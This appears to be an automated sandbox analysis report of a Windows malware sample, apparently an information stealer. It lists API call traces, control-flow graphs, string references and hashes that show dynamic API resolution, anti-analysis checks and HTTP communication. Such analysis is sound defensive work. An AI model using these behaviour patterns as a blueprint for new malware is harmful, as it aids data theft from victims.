                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                                • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                                Strings
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                                • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                                • API String ID: 2127927946-2218711628
                                                • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                                • Instruction ID: 5e1cd967cc1bd71f365b3ff5871be6e8d111942329c8327febd6a33c3aeace51
                                                • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                                • Instruction Fuzzy Hash: 5841BD79740624EBC718AFE5EC8DB987F70AB4C712BA0C062F90296190C7F9D5019B3D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 674 419b46-419b4d 672->674 675 419b16-419b41 GetProcAddress * 2 672->675 676 419b68-419b6f 674->676 677 419b4f-419b63 GetProcAddress 674->677 675->674 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                                APIs
                                                • GetProcAddress.KERNEL32(76210000,00898850), ref: 004198A1
                                                • GetProcAddress.KERNEL32(76210000,00898A18), ref: 004198BA
                                                • GetProcAddress.KERNEL32(76210000,00898A00), ref: 004198D2
                                                • GetProcAddress.KERNEL32(76210000,00898A60), ref: 004198EA
                                                • GetProcAddress.KERNEL32(76210000,00898AC0), ref: 00419903
                                                • GetProcAddress.KERNEL32(76210000,00899A30), ref: 0041991B
                                                • GetProcAddress.KERNEL32(76210000,00896F88), ref: 00419933
                                                • GetProcAddress.KERNEL32(76210000,00896E68), ref: 0041994C
                                                • GetProcAddress.KERNEL32(76210000,00898A30), ref: 00419964
                                                • GetProcAddress.KERNEL32(76210000,00898A48), ref: 0041997C
                                                • GetProcAddress.KERNEL32(76210000,00898A90), ref: 00419995
                                                • GetProcAddress.KERNEL32(76210000,00898A78), ref: 004199AD
                                                • GetProcAddress.KERNEL32(76210000,00896DE8), ref: 004199C5
                                                • GetProcAddress.KERNEL32(76210000,00898AA8), ref: 004199DE
                                                • GetProcAddress.KERNEL32(76210000,008C60B8), ref: 004199F6
                                                • GetProcAddress.KERNEL32(76210000,00896EC8), ref: 00419A0E
                                                • GetProcAddress.KERNEL32(76210000,008C5FC8), ref: 00419A27
                                                • GetProcAddress.KERNEL32(76210000,008C61C0), ref: 00419A3F
                                                • GetProcAddress.KERNEL32(76210000,00896CE8), ref: 00419A57
                                                • GetProcAddress.KERNEL32(76210000,008C5FF8), ref: 00419A70
                                                • GetProcAddress.KERNEL32(76210000,00896F08), ref: 00419A88
                                                • LoadLibraryA.KERNEL32(008C6238,?,00416A00), ref: 00419A9A
                                                • LoadLibraryA.KERNEL32(008C5FE0,?,00416A00), ref: 00419AAB
                                                • LoadLibraryA.KERNEL32(008C6178,?,00416A00), ref: 00419ABD
                                                • LoadLibraryA.KERNEL32(008C6160,?,00416A00), ref: 00419ACF
                                                • LoadLibraryA.KERNEL32(008C6208,?,00416A00), ref: 00419AE0
                                                • GetProcAddress.KERNEL32(75B30000,008C61D8), ref: 00419B02
                                                • GetProcAddress.KERNEL32(751E0000,008C6190), ref: 00419B23
                                                • GetProcAddress.KERNEL32(751E0000,008C60D0), ref: 00419B3B
                                                • GetProcAddress.KERNEL32(76910000,008C6220), ref: 00419B5D
                                                • GetProcAddress.KERNEL32(75670000,00896F28), ref: 00419B7E
                                                • GetProcAddress.KERNEL32(77310000,00899B60), ref: 00419B9F
                                                • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00419BB6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad
                                                • String ID: Fs$NtQueryInformationProcess
                                                • API String ID: 2238633743-1241331114
                                                • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                                • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                                APIs
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                  • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                  • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                  • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                                • StrCmpCA.SHLWAPI(?,008CAEB0), ref: 0040493A
                                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,008CAEC0), ref: 00404DE8
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                                • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                                • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                                • HttpOpenRequestA.WININET(00000000,008CAEF0,?,008CA638,00000000,00000000,00400100,00000000), ref: 00404B15
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                • String ID: "$"$------$------$------
                                                • API String ID: 2402878923-2180234286
                                                • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                                • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                                • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocNameProcessUser
                                                • String ID:
                                                • API String ID: 1206570057-0
                                                • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                                • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                                • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                                APIs
                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                • ExitProcess.KERNEL32 ref: 0040117E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitInfoProcessSystem
                                                • String ID:
                                                • API String ID: 752954902-0
                                                • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                                • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                                • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                                APIs
                                                • GetProcAddress.KERNEL32(76210000,00896E48), ref: 00419C2D
                                                • GetProcAddress.KERNEL32(76210000,00896F68), ref: 00419C45
                                                • GetProcAddress.KERNEL32(76210000,008C6118), ref: 00419C5E
                                                • GetProcAddress.KERNEL32(76210000,008C6040), ref: 00419C76
                                                • GetProcAddress.KERNEL32(76210000,008C5F80), ref: 00419C8E
                                                • GetProcAddress.KERNEL32(76210000,008C5F98), ref: 00419CA7
                                                • GetProcAddress.KERNEL32(76210000,00894A18), ref: 00419CBF
                                                • GetProcAddress.KERNEL32(76210000,008C5FB0), ref: 00419CD7
                                                • GetProcAddress.KERNEL32(76210000,008C6058), ref: 00419CF0
                                                • GetProcAddress.KERNEL32(76210000,008C6280), ref: 00419D08
                                                • GetProcAddress.KERNEL32(76210000,008C62C8), ref: 00419D20
                                                • GetProcAddress.KERNEL32(76210000,00896FA8), ref: 00419D39
                                                • GetProcAddress.KERNEL32(76210000,00896D28), ref: 00419D51
                                                • GetProcAddress.KERNEL32(76210000,00896FC8), ref: 00419D69
                                                • GetProcAddress.KERNEL32(76210000,00897068), ref: 00419D82
                                                • GetProcAddress.KERNEL32(76210000,008C6298), ref: 00419D9A
                                                • GetProcAddress.KERNEL32(76210000,008C6310), ref: 00419DB2
                                                • GetProcAddress.KERNEL32(76210000,00894D88), ref: 00419DCB
                                                • GetProcAddress.KERNEL32(76210000,00896EA8), ref: 00419DE3
                                                • GetProcAddress.KERNEL32(76210000,008C6328), ref: 00419DFB
                                                • GetProcAddress.KERNEL32(76210000,008C62B0), ref: 00419E14
                                                • GetProcAddress.KERNEL32(76210000,008C62F8), ref: 00419E2C
                                                • GetProcAddress.KERNEL32(76210000,008C62E0), ref: 00419E44
                                                • GetProcAddress.KERNEL32(76210000,00897088), ref: 00419E5D
                                                • GetProcAddress.KERNEL32(76210000,008C6340), ref: 00419E75
                                                • GetProcAddress.KERNEL32(76210000,008C8C20), ref: 00419E8D
                                                • GetProcAddress.KERNEL32(76210000,008C8AD0), ref: 00419EA6
                                                • GetProcAddress.KERNEL32(76210000,008C8C08), ref: 00419EBE
                                                • GetProcAddress.KERNEL32(76210000,008C8AE8), ref: 00419ED6
                                                • GetProcAddress.KERNEL32(76210000,008C8BA8), ref: 00419EEF
                                                • GetProcAddress.KERNEL32(76210000,008C8B90), ref: 00419F07
                                                • GetProcAddress.KERNEL32(76210000,008C8A40), ref: 00419F1F
                                                • GetProcAddress.KERNEL32(76210000,008C8B00), ref: 00419F38
                                                • GetProcAddress.KERNEL32(76210000,008947B0), ref: 00419F50
                                                • GetProcAddress.KERNEL32(76210000,008C8B18), ref: 00419F68
                                                • GetProcAddress.KERNEL32(76210000,008C8A70), ref: 00419F81
                                                • GetProcAddress.KERNEL32(76210000,00896D48), ref: 00419F99
                                                • GetProcAddress.KERNEL32(76210000,008C8BD8), ref: 00419FB1
                                                • GetProcAddress.KERNEL32(76210000,00896D68), ref: 00419FCA
                                                • GetProcAddress.KERNEL32(76210000,008C8B48), ref: 00419FE2
                                                • GetProcAddress.KERNEL32(76210000,008C8C98), ref: 00419FFA
                                                • GetProcAddress.KERNEL32(76210000,00896E88), ref: 0041A013
                                                • GetProcAddress.KERNEL32(76210000,00896DA8), ref: 0041A02B
                                                • LoadLibraryA.KERNEL32(008C8BC0,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                                • LoadLibraryA.KERNEL32(008C8AB8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                                • LoadLibraryA.KERNEL32(008C8A58,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
                                                • LoadLibraryA.KERNEL32(008C8B78,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A072
